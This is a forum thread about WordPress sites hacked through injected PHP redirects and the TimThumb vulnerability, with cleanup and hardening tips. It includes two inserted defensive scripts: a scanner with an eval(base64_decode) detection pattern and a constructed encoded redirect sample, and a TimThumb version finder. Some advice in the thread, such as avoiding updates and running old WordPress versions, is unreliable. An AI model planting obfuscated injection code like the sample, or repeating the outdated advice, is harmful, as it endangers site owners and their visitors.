All of my wordpress sites hacked! Are yours?

66 replies
Last week, someone injected malicious PHP code into my wordpress sites. I fixed it, but now I see the same hacker is going at it at other people's sites. I just took a peek at a client's server (not on mine, totally different) and they did it there too!

What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.

Has this happened to you?

This is how I fixed it:
First, you should ask your host if they have backups. If they do, get one. Second, you want to make sure to make a copy of wp-config.php and save it to your desktop. Also make sure to save your uploads folder. Then what I did was delete every file in my site and reinstall wp manually. Then I uploaded my uploads folder. When you install wp again, use all the details from the wp-config.

You'll need a backup of your theme to reupload in the new install. If you won't have one, see if your host has a backup of your site.


I think this happens because of an outdated wp install and outdated plugins.

This is a serious thing guys!!
#hacked #sites #wordpress
  • Profile picture of the author HarrieB
    You should use the backup buddy plugin to have a backup of all your data.
    Make sure your wordpress is updated.
    You should change your wp-login password often!!
    There is a plugin, wp security scan; you can use that to find any code/injections inside your wordpress!
  • Profile picture of the author Entrecon
    I had someone suggest a tool that could be used on PHP driven sites. It was on another forum where someone had been hacked. I am not familiar with the tool, but it might be worth checking out:
    http://www.spambotsecurity.com/zbblock.php
    Signature

    Visit My website http://kipferguson.com

  • Profile picture of the author SteveJohnson
    Nicole, don't want to scare you - but just be aware that some of the latest exploits involving WordPress were due to a thumbnail creation script called TimThumb.

    The problem is that the uploaded bad script sometimes gets stored in ... you guessed it! ... the wp-content/uploads folder (the cache folder could be in several places, though, including your theme folder). So your [not-so-]complete wipe and replacement of files may not have been quite enough.

    IF the source of your trouble originally was the TimThumb problem, the nasty little critter might still be hidden in one of your wp-content folders. Look for folders named 'cache', and delete their contents.
    Signature

    The 2nd Amendment, 1789 - The Original Homeland Security.

    Gun control means never having to say, "I missed you."

    • Profile picture of the author Ord Allenbea
      This has happened for a long time and will continue to happen. Wordpress is open source and because the source is viewable by any and all it will always be a target.

      None of my blogs have ever been hacked though as I make sure to secure them. There are many ways to secure your blog, do a search on google for wordpress security.
    • Profile picture of the author Michael Fereday
      Thanks Nicole, and Steve Johnson for the tips.
      Signature

      Like Dogs? Come see us to Get Daily Heart, Soul and Fun for The Dog Lover in You! http://www.facebook.com/PuppyDogDaily ; http://www.PuppyDogDaily.com

    • Profile picture of the author jennyo
      Originally Posted by SteveJohnson View Post

      Nicole, don't want to scare you - but just be aware that some of the latest exploits involving WordPress were due to a thumbnail creation script called TimThumb.

      The problem is that the uploaded bad script sometimes gets stored in ... you guessed it! ... the wp-content/uploads folder (the cache folder could be in several places, though, including your theme folder). So your [not-so-]complete wipe and replacement of files may not have been quite enough.

      IF the source of your trouble originally was the TimThumb problem, the nasty little critter might still be hidden in one of your wp-content folders. Look for folders named 'cache', and delete their contents.
      Yes, the malware is in wp-config. It's in all your plugins (all index.php throughout site), throughout themes folder in functions, header, footer, sidebar, single etc. etc. It might be eval code.

      It looks like this: eval(base64_decode("[base64-encoded payload] ...


      Even if you find and delete all of that, hackers put backdoors so they simply come back and do the same thing.


      I'm still doing research and looking for a permanent solution.
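
The two checks described in this post and in the one it quotes (PHP files sitting in uploads or cache folders, and eval(base64_decode(...)) strings inside theme, plugin and config files), as an added example that is not part of the original post or any poster's tool. The folder names in DATA_DIRS, the rule names and the small sample site it builds are assumptions constructed for the demonstration; decoded payloads are only returned as text for review and are never executed.

```python
import base64
import binascii
import os
import re
import tempfile

# Folders that should hold media or cached images, never executable PHP.
# Assumption: adjust to the cache/upload folder names your themes really use.
DATA_DIRS = {"uploads", "cache"}
PHP_EXT = (".php", ".php5", ".phtml")

# eval(base64_decode("...")): whitespace is tolerated everywhere, including
# inside the blob, because copies of such code are often line-wrapped.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*([\"'])([A-Za-z0-9+/=\s]+)\1",
    re.IGNORECASE,
)


def decode_for_review(blob):
    """Decode an embedded base64 blob to text so a person can read it."""
    compact = re.sub(r"\s+", "", blob)
    compact += "=" * (-len(compact) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(compact)
    except (binascii.Error, ValueError):
        return None  # truncated or corrupt blob: report it undecoded
    return raw.decode("utf-8", errors="replace")


def scan_file(path, root):
    """Return a list of findings (dicts) for one file."""
    findings = []
    rel = os.path.relpath(path, root)
    parent_dirs = set(rel.lower().split(os.sep)[:-1])
    if not path.lower().endswith(PHP_EXT):
        return findings
    # Rule 1: any PHP file under an uploads/cache folder needs a manual look.
    # A blank index.php placeholder will show up here too; confirm it is empty.
    if parent_dirs & DATA_DIRS:
        findings.append({"file": rel, "rule": "php-in-data-dir", "decoded": None})
    # Rule 2: encoded code handed straight to eval().
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    for match in EVAL_B64.finditer(text):
        findings.append({
            "file": rel,
            "rule": "eval-base64",
            "decoded": decode_for_review(match.group(2)),
        })
    return findings


def scan_tree(root):
    """Walk the whole install: core, themes, plugins, uploads, wp-config."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            results.extend(scan_file(os.path.join(dirpath, name), root))
    return sorted(results, key=lambda f: (f["file"], f["rule"]))


def build_constructed_site(root):
    """Create a tiny, constructed WordPress-like tree to scan (demo input)."""
    payload = base64.b64encode(
        b'header("Location: http://example.invalid/");').decode("ascii")
    files = {
        "wp-includes/clean.php": "<?php echo 'ok';\n",
        "wp-content/themes/demo/header.php":
            '<?php eval(base64_decode("%s")); ?>\n<html>\n' % payload,
        "wp-content/uploads/2012/02/photo.jpg": "not really a jpeg\n",
        "wp-content/uploads/2012/02/cache/ext.php": "<?php /* constructed */\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_constructed_site(site)
        for hit in scan_tree(site):
            print(hit["rule"], hit["file"], repr(hit["decoded"]))
```

Run it against a downloaded copy of the site rather than the live server, and treat every hit as a file to open and read, not as proof of infection.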
  • Profile picture of the author traficmaster
    i can recommend backup buddy too
  • Profile picture of the author typoo999
    My sites are still alive. I use wordpress for every site.
    Signature
    Boom shakalaka!
    • Profile picture of the author Karen Blundell
      WordPress is a great tool, but like all tools, it needs care.

      So my advice to all WordPress users:
      Update, Update, Update, secure, secure, secure, backup, backup, backup!

      • Profile picture of the author trevpen
        Originally Posted by Karen Blundell View Post

        WordPress is a great tool, but like all tools, it needs care.

        So my advice to all WordPress users:
        Update, Update, Update, secure, secure, secure, backup, backup, backup!

        Good advice! As always, prevention is better than cure...
  • Profile picture of the author Abhi.garg
    No! It hasn't happened to me! My sites are still alive on wordpress & my blogs are also still alive.
  • Profile picture of the author wuken
    It used to happen to me before.
    Generally it is because some files have loose read/write permissions. And hackers are able to exploit wp plugins which have upload facility. Just keep track of those plugins with upload function particularly.
  • Profile picture of the author sodevious
    It seems that the problem is timthumb. ugh
  • Profile picture of the author Istvan Horvath
    - No, it has never happened to me. Which doesn't mean it can't ever happen. It can...
    - All the automatic backup things that some ignorant people are pushing in this thread will do NOTHING good if you are going to install and install and install again and again the same corrupt (damaged) files. Why would you do that?
    - Unless you know exactly which files have been damaged... don't put back any saved files before making sure they are safe
    - Oh, and don't forget: the malicious code can be even in your database (that wasn't touched in the scenario described above)

    If you are not sure how to check everything - this is the time when hiring a pro to look through your files could be well worth the money spent.
  • Profile picture of the author Tim Franklin
    Interesting thread, and some varying opinions on what may or may not be to blame, the trouble with that approach is that when you ASSume you know what that means.

    I would be very concerned about an issue like this because I would want to make sure it never happened again or at least take as many steps as you can to prevent it from happening, which means from time to time, changing the salt and nonce keys in your config file.

    As well, never, ever use an auto script installer to install wordpress, which I have seen many (so-called gurus) recommend. I laugh when I see that kind of behavior because I know right away they don't know a thing about what they are trying to sell me.

    By all means take all the precautions you can, but also be smart about it. Don't assume you know what caused the problem until you actually know it. It's sort of like working on a car that has a bad spark plug: until you find out which one of those spark plugs is bad, you're going to continue to have a problem.

    Find the problem and fix it, Oh and one more thing,

    Don't blame a plugin; it is never a plugin's fault, because all plugins operate on PHP, which means if you have a problem it's on the machine your website is installed on. Look up Linux security sessions, or talk to your host about their security problem.
    Signature
    Bitcoin | Crypto | Blockchain Secrets |
  • Profile picture of the author Ord Allenbea
    @Tim some plugins have been known to have some not so friendly code in them.

    With that said if you own a wordpress blog here are some tips for you. Again I secure all mine and never been hacked. I use no plugins for security at all.

    1. Make sure your server has php suexec installed (this blocks the need for 777 permissions and blocks php injections).

    2. If you do not have php suexec then make sure your permissions are not 777 on any file.

    3. Make sure all folders contain a blank index.php to block anyone from viewing the files in those folders.

    4. Change the prefix on your database - some may need a coder to do this. Do not attempt if you do not understand databases.

    5. Disable any and all "auto updates". You do not have to update your blog just because a new release is out. Many times this could be a huge mistake, if it is not broken don't fix it!

    6. Admin approval should be required for any and all comments and registrations.

    7. Change your wp-admin folder name - again you may need a coder for this if you do not know what you are doing.

    8. Change your plugin folder name - again you may need a coder for this if you do not know what you are doing.

    9. Remove the WP version from your headers. You should be able to edit the template files from admin. Locate the header and you will see code that specifies wp version, remove it.

    10. You could take a step further and add password protection to your admin folder by using .htaccess to password protect the folder. You will have to login twice now in order to access admin but a little extra security never hurts.
    • Profile picture of the author Kingfish85
      Originally Posted by Ord Allenbea View Post

      @Tim some plugins have been known to have some not so friendly code in them.

      With that said if you own a wordpress blog here are some tips for you. Again I secure all mine and never been hacked. I use no plugins for security at all.

      1. Make sure your server has php suexec installed (this blocks the need for 777 permissions and blocks php injections).

      2. If you do not have php suexec then make sure your permissions are not 777 on any file.

      3. Make sure all folders contain a blank index.php to block anyone from viewing the files in those folders.

      4. Change the prefix on your database - some may need a coder to do this. Do not attempt if you do not understand databases.

      5. Disable any and all "auto updates". You do not have to update your blog just because a new release is out. Many times this could be a huge mistake, if it is not broken don't fix it!

      6. Admin approval should be required for any and all comments and registrations.

      7. Change your wp-admin folder name - again you may need a coder for this if you do not know what you are doing.

      8. Change your plugin folder name - again you may need a coder for this if you do not know what you are doing.

      9. Remove the WP version from your headers. You should be able to edit the template files from admin. Locate the header and you will see code that specifies wp version, remove it.

      10. You could take a step further and add password protection to your admin folder by using .htaccess to password protect the folder. You will have to login twice now in order to access admin but a little extra security never hurts.
      These are good points. I will add to them though,

      Your wp-config file should ABSOLUTELY be moved out of your public_html directory.

      Use Login Lockdown

      Remove the password reset
      Signature

      |~| VeeroTech Hosting - sales @ veerotech.net
      |~| High Performance CloudLinux & LiteSpeed Powered Web Hosting
      |~| cPanel & WHM - Softaculous - Website Builder - R1Soft - SpamExperts
      |~| Visit us @veerotech Facebook - Twitter - LinkedIn

  • Profile picture of the author sodevious
    @tim, I most certainly think it can be a plugin's fault. Being coded in PHP just gives it that much more power over your entire wp site.
  • Profile picture of the author webfighter
    Yes, I had three of my blogs hacked. It was tim thumb back then.

    This plugin helped me in cleaning up:
    WordPress › Timthumb Vulnerability Scanner « WordPress Plugins
  • Profile picture of the author Sojourn
    Originally Posted by sodevious View Post

    What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.
    This, by the way, sounds very much like the Google Redirect virus which is not a WordPress issue. Based on the steps you took and what you saw in your client's server, it does sound like you know for sure that your issue was injected code but in case anyone runs across this post in the future, there are other issues that could cause redirects to spam besides a WordPress plug-in.

    Glad you got it fixed. Keeping WordPress safe is no small issue and shouldn't be overlooked. I know I don't use an autoinstall script anymore, store my own backups, lock my admin and login screens, hide my files and take a few other precautions and I still worry. Posts like this always remind me to check my sites again to make sure everything is still in place.
  • Profile picture of the author Davan
    9 out of 10 of mine all hacked last month. Sad part: it's taken a couple of years to get this far. While I have two up now the 10th went down last week. Rebuilt the most recent from the ground up via a paid for premium template. Updated all plugins, themes, framework and new database. It was up for two whole days before going down again. Still trying to recover and reminding myself, what doesn't kill me makes me stronger.

    Thanks for the insight.
    Signature

    "No one succeeds alone." unknown
    "Knowing is not enough; we must apply. Willing is not enough; we must do." Johann von Goethe
    "There are no stupid people, only different levels of ignorance." me

    • Profile picture of the author Kim Phoenix
      I had two sites that recently were hacked too. I was notified by a visitor to my site that she was getting warnings by her Norton antivirus. I contacted my hosting company with the information she provided me, and the hosting company was able to remove the malicious content. They got in through an outdated timthumb.php file. So you need to get the updated timthumb.php file here.

      My sites were still functioning though, so don't assume that because your sites are running, that they have not been hacked. You can try a free scan at Sucuri, but sometimes it has false positives.

      Also, like others have mentioned, always keep your WP versions and plugins current.
      Signature
      http://www.BuyHealthPLR.com (PLR Written & Edited by a Healthcare Professional)

      http://www.TheOnlineChick.com

      • Profile picture of the author Ord Allenbea
        Keeping up to date does not correct the issue of hacking, if anything it escalates the problem. All hackers have access to the code as it is released and they work on new ways to hack the new version.

        I have blogs that still run 2.5 and 2.7 but as posted above they are secured because I secured them myself. Only plugins I use are those that I trust and are built properly (not by some free plugin builder).

        Originally Posted by Kim Phoenix View Post

        I had two sites that recently were hacked too. I was notified by a visitor to my site that she was getting warnings by her Norton antivirus. I contacted my hosting company with the information she provided me, and the hosting company was able to remove the malicious content. They got in through an outdated timthumb.php file. So you need to get the updated timthumb.php file here.

        My sites were still functioning though, so don't assume that because your sites are running, that they have not been hacked. You can try a free scan at Sucuri, but sometimes it has false positives.

        Also, like others have mentioned, always keep your WP versions and plugins current.
  • Profile picture of the author chow
    Tim thumb got me too. What a headache. Hope you get it all squared away.
  • Profile picture of the author fin
    I use some security plug-ins. Since I installed them, I regularly get e-mails telling me someone has tried to hack into my site.

    I guess it's just robots.
  • Profile picture of the author WriterWahm
    It's happened to me twice! First time there was no backup and I lost everything!!! Then it also happened again - was a New Year's gift in fact. But I backup these days and I'm very careful what plugins I install. Thanks for the tips you shared. And I know to avoid TimThumb (had it on my sites at first.)
    Signature

    PM me if you want a romantic fiction ghostwriter.

  • Profile picture of the author Ord Allenbea
    For those that seem to be missing this - http://www.warriorforum.com/main-int...ml#post5548845

    Changing your passwords does not help when wordpress has issues itself, they do not need your admin password to hack your wordpress. Login lockdown does not stop any hackers because again they do not need your admin password.

    Read the above thread because that is the way to secure wordpress.

    One more thing to add - if you do not have php suexec installed on your server then make sure no file permissions are 777.
  • Profile picture of the author Valdor Kiebach
    You can also get your websites infected with malware from your own computer.
    This happens when you use FTP and your computer has a virus that will then alter any index.xxx pages on any site you FTP to.

    I had this happen to me and a quick (actually slow) full AVG scan, antimalware scan and spybot scan of my computer cured the problem.

    Also changing the permission on all index.xxx files to 444 helped.
  • Profile picture of the author BudgetSEO
    Originally Posted by sodevious View Post

    Last week, someone injected malicious PHP code into my wordpress sites. I fixed it, but now I see the same hacker is going at it at other people's site. I just took a peek at a client's server (not on mine, totally different) and they did it there too!

    What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.

    Has this happened to you?

    This is how I fixed it:
    First, you should ask your host if they have backups. If they do, get one. Second, you want to make sure to make a copy of wp-config.php and save it to your desktop. Also make sure to save your uploads folder. Then what I did was delete every file in my site and reinstall wp manually. Then I uploaded my uploads folder. When you install wp again, use all the details from the wp-config.

    You'll need a backup of your theme to reupload in the new install. If you won't have one, see if your host has a backup of your site.

    I think this happens because of an outdated wp install and outdated plugins.

    This is a serious thing guys!!
    Wrong, it can be moved to a different location on the server itself.
    Also there are some other files which need to be secured to make your site somewhat immune to those injections.
    Never depend on your host for a backup, have your own parachute if you've to jump mid-air, your host won't bat for you.
    Signature
    Let me Secure your wordpress website for the price of a small Pizza
    Weather Balloons Election Supplies
    If you need the ''cheapest'' quote, don't waste your time contacting me.
  • Profile picture of the author WillR
    Originally Posted by Richard Odell View Post

    What's the betting you installed wordpress from cpanel?
    A number of you said this... can I ask why this is the case?

    I don't use much Wordpress but just curious. Is it just because they use the same database prefix and admin as the username or are there other reasons?
    • Profile picture of the author BudgetSEO
      Originally Posted by WillR View Post

      A number of you said this... can I ask why this is the case?

      I don't use much Wordpress but just curious. Is it just because they use the same database prefix and admin as the username or are there other reasons?
      The database prefix is the same for fantastico installs, can be changed with a bit of tweaking the SQL Database.

      As for the admin username, you get to choose that during install.

      The fantastico follows a pattern, leaves footprints making the hackers job easy.

      A manual install is much better,

      To make it simple,
      Would you prefer spending 25 extra minutes while you are installing the script and sleep peacefully for the time to come?
      OR
      Would you prefer taking a shortcut and face nightmares just because you used the shortcut?
      • Profile picture of the author WillR
        Originally Posted by BudgetSEO View Post

        The database prefix is the same for fantastico installs, can be changed with a bit of tweaking the SQL Database.

        As for the admin username, you get to choose that during install.

        The fantastico follows a pattern, leaves footprints making the hackers job easy.

        A manual install is much better,

        To make it simple,
        Would you prefer spending 25 extra minutes while you are installing the script and sleep peacefully for the time to come?
        OR
        Would you prefer taking a shortcut and face nightmares just because you used the shortcut?
        Thanks, yes I know about the username and database prefixes, that's what I already mentioned, but I am wanting to know what the other reason(s) are for not using it, if any.

        Leaves footprints doesn't really tell me much. What footprints exactly? Are we just guessing here or do we know what the exact issues are?

        Anyone else have an idea?

        I'm all for it (security) and use a full wordpress security setup myself but I'm wanting to know what the exact reason for not doing a fantastico install is.
        • Profile picture of the author BudgetSEO
          Originally Posted by WillR View Post

          Thanks, yes I know about the username and database prefixes, that's what I already mentioned, but I am wanting to know what the other reason(s) are for not using it, if any.

          Leaves footprints doesn't really tell me much. What footprints exactly? Are we just guessing here or do we know what the exact issues are?

          Anyone else have an idea?

          I'm all for it (security) and use a full wordpress security setup but I'm wanting to know what the exact reason for not doing a fantastico install are.
          Fantastico install leaves a .txt file where you install the wordpress (root), potential risk as fantastico asks you keep that file intact and has the same filename.

          I don't see any other security risks as of now, but honestly, if you do a fantastico install better do the security measures, change DB Prefix etc., rather than waiting for someone to take over your site to give you the message.

          I've sent you a PM since you are interested in security.

          Best,
          -BudgetSEO
  • Profile picture of the author tim_buchalka
    Here is a general lowdown on how hackers find websites to hack.

    They look for specific versions of wordpress that have been identified with flaws, or plugins that have also been identified.

    It's very easy to see what version you are running of both of these (footprints). As outlined by BudgetSEO above fantastico installs leave a .txt file which is something else for hackers to look for.

    Many exploits are based on old versions of wordpress - The longer you do not upgrade the greater the chance of being hacked.

    Backups of course are important. But here is something else that is easy to do and can help.

    Create a new user for your blog and give it Admin privileges. Then remove the Admin privilege from your existing Admin account.

    Because many exploits look to hack the Admin account - so if they succeed they have no power to do anything.

    Remember that a lot of hackers are not very smart - They are just using scripts they have found online - These look for the above exploits so if you can fix those up you are much more likely to be safe and secure.

    Sorry to hear about your story! Hope it's all smooth sailing from now on.
    • Profile picture of the author BudgetSEO
      Originally Posted by tim_buchalka View Post

      Here is a general lowdown on how hackers find websites to hack.

      They look for specific versions of wordpress that have been identified with flaws, or plugins that have also been identified.

      It's very easy to see what version you are running of both of these (footprints). As outlined by BudgetSEO above fantastico installs leave a .txt file which is something else for hackers to look for.

      Many exploits are based on old versions of wordpress - The longer you do not upgrade the greater the chance of being hacked.

      Backups of course are important. But here is something else that is easy to do and can help.

      Create a new user for your blog and give it Admin privileges. Then remove the Admin privilege from your existing Admin account.

      Because many exploits look to hack the Admin account - so if they succeed they have no power to do anything.

      Remember that a lot of hackers are not very smart - They are just using scripts they have found online - These look for the above exploits so if you can fix those up you are much more likely to be safe and secure.

      Sorry to hear about your story! Hope it's all smooth sailing from now on.
      There's a plugin available to change the username, afaik it's WPVN Username Change

      You are correct, most of them download some software and hit the button to hijack sites that have holes, without knowing what they are doing and who is being hijacked.

      If you are running on an older version of wordpress, boy you are hanging on a thread, if you know what that means.

      Version 2.9.2 had many holes, also timthumb script if left unattended can cause your site to be injected with some nasty codes.

      The best bet is to,
      1 - Secure your site
      2 - Take frequent backups
      3 - Upgrade to the latest version of the core files and plugins
      4 - Never download any plugin that's outside the WP Repository
      5 - Always stay updated with the latest hacks and hijacks, make sure your website doesn't have those holes
  • Profile picture of the author meltingwaves
    Ah I feel for you. A few weeks back my sites all got hacked and the hacking was dirtyyyyyyy, all over the place, not concealed to one area. I wiped all my sites out and drew up plans to make them twice as effective when I relaunch them. After you get them cleaned up, invest in some security. Worth every penny.
  • Profile picture of the author sara121
    So sad to hear about your sites but all my websites are safe.
  • Profile picture of the author revstan
    My Wp-blogs are totally fine. Up and running, making money.


    Simple Stan
  • Profile picture of the author hassan001
    Intruders are always looking for new ways in a script to hack.... It's not hard for serious database programmers to inject sql and get their desired information.... Many government sites have been hacked, intelligence agencies' sites have been hacked in the past, banks got hacked and a lot more....

    So you can't force anyone to stop but you can take measures from your side for your satisfaction to keep things smooth...

    I am a big fan of wordpress and I have a lot of blogs and websites on wordpress but seriously pay attention to this point....

    "It's not hard for a hacker to hack your cpanel too :p" So I advise everyone to keep daily or if not daily then weekly backup of your websites/blogs and don't put worthy information in easily viewed directories....

    That's all I can do on my side at least

    May God prevent us all from serious hackers.....
  • Profile picture of the author digitalquilluk
    Please, please, please everyone who uses wordpress install WP Firewall plugin...

    Many other methods to secure Wordpress i.e. htaccess file written to stop certain types of files being uploaded etc etc, but everyone who uses Wordpress should install the WP Firewall and login lockdown plugins, they really do help in these types of cases.
  • Profile picture of the author ebuyer123
    Hi there,

    I got the below email from my host about my hacked wordpress sites on Thesis premium theme.

    My QUESTIONs are: What files and folders on my websites should I delete/update? How to check the version of "timthumb.php" on my sites?

    MAIL FROM MY HOSTING COMPANY:

    We have found and corrected exploitable timthumb.php file(s) on your hosting account, which are listed below:

    /home1/myhostaccount/public_html/mysitename1/wp-content/themes/thesis_182/lib/scripts/thumb.php
    /home1/myhostaccount/public_html/mysitename2/wp-content/themes/thesis_183/lib/scripts/thumb.php

    While we have corrected these files, we do recommend you ensure all potential exploits are corrected on your account.

    This is best done by updating all scripts, plugins, modules and themes on your account to the latest version.
    Thank you for your help
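One way to answer the question in the post above (which TimThumb copies exist under an account, and which version each one declares), as an added example that is not part of any poster's message or the host's tooling. It assumes the script declares its version in a `define ('VERSION', ...)` line; the sample tree, its version string and the `gallery` plugin directory are constructed.

```shell
#!/bin/sh
# Added example: list TimThumb copies under a web root with the version each declares.
# Assumption: the script declares its version in a line like define ('VERSION', '<x.y>');

# find_timthumb ROOT -> one "<version><TAB><path>" line per copy, sorted.
find_timthumb() {
    root=$1
    # Select by content, not name: hosts and themes rename the file
    # (thumb.php in the host's e-mail above).
    find "$root" -type f -name '*.php' -exec grep -li 'timthumb' {} + 2>/dev/null |
    while IFS= read -r f; do
        ver=$(sed -n "s/.*define[[:space:]]*([[:space:]]*['\"]VERSION['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$f" | head -n 1)
        if [ -z "$ver" ]; then
            # No version line: keep it only if the file name looks like the
            # script itself; other hits merely reference timthumb in a URL.
            case $(basename "$f") in
                *thumb*.php) ver=unknown ;;
                *) continue ;;
            esac
        fi
        printf '%s\t%s\n' "$ver" "$f"
    done | sort
}

# Constructed sample tree (stubs, not real TimThumb code) for an offline run.
# The version string and the "gallery" plugin directory are made up.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/site1/wp-content/themes/thesis_182/lib/scripts" \
             "$d/site2/wp-content/plugins/gallery"
    printf '%s\n' '<?php' '// TimThumb (constructed stub)' \
        "define ('VERSION', '0.0-sample-a');" \
        > "$d/site1/wp-content/themes/thesis_182/lib/scripts/thumb.php"
    printf '%s\n' '<?php // timthumb stub with the version line stripped' \
        > "$d/site2/wp-content/plugins/gallery/timthumb.php"
    printf '%s\n' '<?php $src = "scripts/timthumb.php?src=a.jpg"; // reference only' \
        > "$d/site2/wp-content/plugins/gallery/functions.php"
    printf '%s\n' "$d"
}

# Run against a real web root when a path is given, e.g.  sh script.sh ~/public_html
[ "$#" -eq 0 ] || find_timthumb "$1"
```

A line reported as `unknown` is a file named like the script but without a readable version line; compare it by hand against a fresh copy from the theme or plugin vendor.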
    • Profile picture of the author BudgetSEO
      Originally Posted by ebuyer123 View Post

      Hi there,

      I got the below email from my host about my hacked wordpress sites on Thesis premium theme.

      My QUESTIONs are: What files and folders on my websites should I delete/update? How to check the version of "timthumb.php" on my sites?



      Thank you for your help
      You were using an older version of timthumb which is insecure and allowed the hacker to do his job.
      • Profile picture of the author ebuyer123
        Originally Posted by BudgetSEO View Post

        You were using an older version of timthumb which is insecure and allowed the hacker to do his job.
        Thank you for your comment. My hosting company already told me about the older version of timthumb file. Can your wp security service solve the problem for me?

        Do I still need to update the timthumb.php files since my hosting company said they have corrected these files on my websites?

        How to check the version of my timthumb.php file?

        Anything else (e.g. to delete files/folders etc.) should I do to make my site clean as before?

        Cheers!
        • Profile picture of the author BudgetSEO
          Originally Posted by ebuyer123 View Post

          Thank you for your comment. My hosting company already told me about the older version of timthumb file.

          Do I still need to update the timthumb.php files since my hosting company said they have corrected these files on my websites?

          How to check the version of my timthumb.php file by the way?

          Anything else (e.g. to delete files/folders etc.) should I do to make my site clean as before?

          Cheers!
          Check this thread - http://www.warriorforum.com/warriors...g-us-10-a.html

          I am not trying to be pushy, or asking you to buy that service; it's only to make you aware of it.

          If you PM me your website link, I'll let you know if it's still vulnerable to being attacked.

          If I don't have the website URL, it's as good as shooting bullets in the dark expecting to score kills.

          There are various parameters and holes that need to be filled, since every website is designed in a different way, there isn't a general rule which is fully applicable to all of them.
  • Profile picture of the author ebuyer123
    Many thanks for your comments and suggestions.
    It turned out to be the "false positive" from the auto scans done by my host's security system.
    Cheers!
    • Profile picture of the author sherys
      I checked my site yesterday, and thought it'd been hacked. I contacted Hostgator who got it back for me, and also told me it had come from malware on my computer. Now, when I go into wp-admin, I can't make any changes there. I have been running Antimalware on my computer today, but not sure what to do about the wp-admin problem.
      • Profile picture of the author ebuyer123
        Originally Posted by sherys View Post

        I checked my site yesterday, and thought it'd been hacked. I contacted Hostgator who got it back for me, and also told me it had come from malware on my computer. Now, when I go into wp-admin, I can't make any changes there. I have been running Antimalware on my computer today, but not sure what to do about the wp-admin problem.
        Can you disable (or rename) all the plugins via FTP access?
        Then try again to see if you can login and use the wp dashboard.

        Good luck!
      • Profile picture of the author Rudy Hermawan
        Originally Posted by sherys View Post

        I checked my site yesterday, and thought it'd been hacked. I contacted Hostgator who got it back for me, and also told me it had come from malware on my computer. Now, when I go into wp-admin, I can't make any changes there. I have been running Antimalware on my computer today, but not sure what to do about the wp-admin problem.
        Hi Sherys,

        Most of the recent attacks on WordPress sites are coming from the outdated timthumb code used by plugins or themes.

        The problem is that not all of the plugins have the update information, so we never know about the problem.

        Fortunately, my hosting provider, which is Bluehost, is aware of this and is doing a scan of our site and automatically upgrading it.

        If you have a problem after logging in to wp-admin, you might try to disable the theme or plugin. You could log in to your cPanel, activate the file manager, go to your /wp-content/themes/, look for the theme and rename the theme's folder.

        Try to log in again to wp-admin. If the problem still exists, use the file manager to go to wp-content/plugins and rename some of the plugin folders.

        If WordPress cannot find the themes or plugins, WordPress will disable them.

        Please do this at your own risk. Doing it wrong will damage your WordPress site and make it unrecoverable in the future.
  • Profile picture of the author Cataclysm1987
    Originally Posted by sodevious View Post

    What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.
    Tricky spammers.

    I've definitely had them do this before. The site doesn't appear hacked. You think you clicked a bad link or something. Then you revisit the site and you go, oh hey, it's fine! I'm at my site.

    No, you're still hacked.
    Signature

    No signature here today!

  • Profile picture of the author bighostchennai
    My WordPress sites were hacked whenever I put them in forums and sites like Fiverr for demo. This happens because some sites have very weak passwords like 12345 or a name etc., which are easily hackable. Always create a password with a combination of letters, numbers and characters. There is software to hack passwords, and it will easily hack weak passwords, so be careful when you create a password.
    • Profile picture of the author BackLinkiT
      The obvious (and slightly controversial) answer, surely, is not to use Wordpress?

      I wouldn't touch it with a bargepole!
    • Profile picture of the author whitworldwide
      Interesting thread.

      I've had 7 of my 9 sites hacked. All my pages displayed the same page, which displayed that it had been hacked.

      I have removed the hack by updating WP version and the plugins, but for two of the sites this has been unsuccessful.

      Does anyone have any ideas on what to do to fix the last two sites?
      • Profile picture of the author Kingfish85
        Originally Posted by whitworldwide View Post

        Interesting thread.

        I've had 7 of my 9 sites hacked. All my pages displayed the same page, which displayed that it had been hacked.

        I have removed the hack by updating WP version and the plugins, but for two of the sites this has been unsuccessful.

        Does anyone have any ideas on what to do to fix the last two sites?
        Yes, contact your web host. They should be able to help you. If they cannot, or can't at least point you in the right direction, it's time to move.
        Signature

        |~| VeeroTech Hosting - sales @ veerotech.net
        |~| High Performance CloudLinux & LiteSpeed Powered Web Hosting
        |~| cPanel & WHM - Softaculous - Website Builder - R1Soft - SpamExperts
        |~| Visit us @veerotech Facebook - Twitter - LinkedIn

      • Profile picture of the author andersvinther
        Originally Posted by whitworldwide View Post

        Does anyone have any ideas on what to do to fix the last two sites?
        sucuri.net are quite good!
  • Profile picture of the author AlwaysOnABHI
    My client had a similar hack and it wasn't a huge deal. The hacker put in code that Google sees and it gives them bragging rights, my guess anyway.

    When you get a new domain, don't use Fantastico to install WordPress. Fantastico installs all use common factors that hackers can identify quickly. Install by uploading the files and create the database manually.
  • Profile picture of the author CodeShack
    One of the common issues right now is infected plugins or themes that people are downloading.

    There is a widespread infection happening by malicious coders and sharers, when they add code to add adverts, redirection, content locking or malware.

    The code itself looks very innocent and will not detect as a virus or malware.
    The offsite content it fetches, after installation, when the visitor fetches your page is where the payload/content is fetched, delivered and executed.

    If you are getting hacked/nulled/shared themes and plugins - and you are not 100% sure of it, the source and are unable to verify it's safe - DON'T DO IT!! - go get a free theme/plugin or buy the one you need.

    Yes, there have been issues with the TimThumb exploit, I've not come across it myself

    Yes, site owners are still dumb and use weak/stupid password choices - go get a decent password, it takes moments and can save your site and content, your partner/pet/family-member will not be offended that you're not using them or their birthday as a password!!

    I do come across infected themes and plugins a number of times a week!!.

    Cheers,
    .
  • Profile picture of the author oniram
